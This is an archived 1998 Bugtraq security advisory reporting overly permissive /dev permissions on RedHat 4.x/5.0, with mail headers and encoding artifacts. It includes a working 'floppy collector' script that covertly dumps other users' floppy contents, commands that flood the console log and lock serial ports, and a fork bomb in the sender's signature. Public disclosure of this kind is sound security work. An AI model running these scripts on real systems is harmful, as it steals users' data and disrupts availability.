|
Details Date: Thu, 5 Feb EDT 03:05:00 +1100 (EST) From: Smart List user <slist@cyber.com.au> cheops Received: from brimstone.netspace.org by postbox.anu.edu.au with ESMTP (1.37.109.16/16.2) id AA105288284; Thu, 5 Feb 1998 03:04:45 +1100 Received: from unknown@netspace.org (port 32056 [128.148.157.6]) by brims= tone.netspace.org with ESMTP id <739-15594>; Wed, 4 Feb 1998 10:54:46 -05= 00 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c= ) with spool id 7421619 for BUGTRAQ@NETSPACE.ORG; Wed, 4 Feb 1998 10:5= 3:03 -0500 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id KAA16604 for <BUGTRAQ@NETSPACE.ORG>; Wed, 4 Feb 1998 10:52:30 -= 0500 Received: from unknown@netspace.org (port 32056 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <658-15595>; Wed, 4 Feb 19= 98 10:51:04 -0500 Approved-By: aleph1@UNDERGROUND.ORG Received: from mx1.polbox.com (mx1.polbox.com [195.116.5.16]) by netspace= =2Eorg (8.8.7/8.8.2) with ESMTP id CAA10552 for <BUGTRAQ@NETSPACE.ORG>= ; Wed, 4 Feb 1998 02:58:43 -0500 Received: from lcamtuf (ppp3-cst162.warszawa.tpnet.pl [195.116.251.162]) = by mx1.polbox.com (8.8.5/rev-A0) with SMTP id JAA00118 for <BUGTRAQ@NETSPACE.ORG>; Wed, 4 Feb 1998 09:04:08 +0100 Mime-Version: 1.0 Content-Type: text/plain; charset=3D"iso-8859-2" X-Priority: 3 X-Msmail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.71.1712.3 X-Mimeole: Produced By Microsoft MimeOLE V4.71.1712.3 Content-Transfer-Encoding: 8bit X-Mime-Autoconverted: from quoted-printable to 8bit by netspace.org id CA= A10555 Message-Id: <01bd3149$43e38600$a2fb74c3@lcamtuf> Date: Wed, 4 Feb 1998 09:45:37 +0100 Sender: avalon From: =3D?UNKNOWN-8BIT?Q?Micha=3DB3?=3D Zalewski <lcamtuf@POLBOX.COM> Subject: RedHat 4.x/5.0 /dev permissions To: BUGTRAQ@NETSPACE.ORG Approv e53 ed: darrenr@cyber.com.au X-Originally-To: To: BUGTRAQ@NETSPACE.ORG X-Originated-From: From: =3D?UNKNOWN-8BIT?Q?Micha=3DB3?=3D Zalewski <lcamtuf@POLBOX.COM> First one ---------- Any user can read data from (even not mounted) floppy using "cat /dev/fd0H1440". It isn't dangerous itself, but... Any user may write a script, which periodically checks if floppy has been just unmounted, then dumps it's content to a file. Here's a sample 'floppy collector': -- fdumper -- #!/bin/sh DUMP_DEV=3D/dev/fd0H1440 MOUNT_DEV=3D/dev/fd0 LABEL=3D0 DUMPED=3D1 while :; do sleep 1 if [ "`mount|grep \"^${MOUNT_DEV}\"`" =3D "" ]; then if [ "$DUMPED" =3D "0" ]; then echo "Dumping image #$LABEL..." cat $DUMP_DEV >.fdimage$LABEL let LABEL=3DLABEL+1 DUMPED=3D1 fi else DUMPED=3D0 fi done -- eof -- Also, if there's no floppy in drive, unprivledged user may flood kernel log console (local console by default!!!): [user@host sth]$ while :; do cat /dev/fd0H1440;done & It will generate a lot of kernel messages, which will be logged to /var/log/messages AND to console (default klogd behaviour). Also, every printk(...) (called by fd driver) uses sync() to flush buffers. It will cause abnormal hdd activity. Second one ----------- (not tested with rh 5.0) Ordinary user are allowed to read /dev/ttyS*. Serial ports driver disallows multiple access attempts at the same time, so user may permanently lock choosen port using this command: [user@host user]$ cat /dev/ttyS0 (Ctrl+Z) [user@host user]$ cat /dev/ttyS0 cat: /dev/ttyS0: device is busy Now serial port is in unusable state. That's all? ------------ There are also a lot of other, not-so-common devices, eg. /dev/sequencer,= which are world-readable or even world-writable. There's no ANY reason to give ordinary users direct access to hardware devices. It's quite easy (as shown above ;) to obtain an interesting data or cause system failure by reading/writing these devices. Solution... ------------ ls -l /dev/* | grep "r-- " chmod ;) _______________________________________________________________________ Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]= Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P. = Deustch] =3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=3D=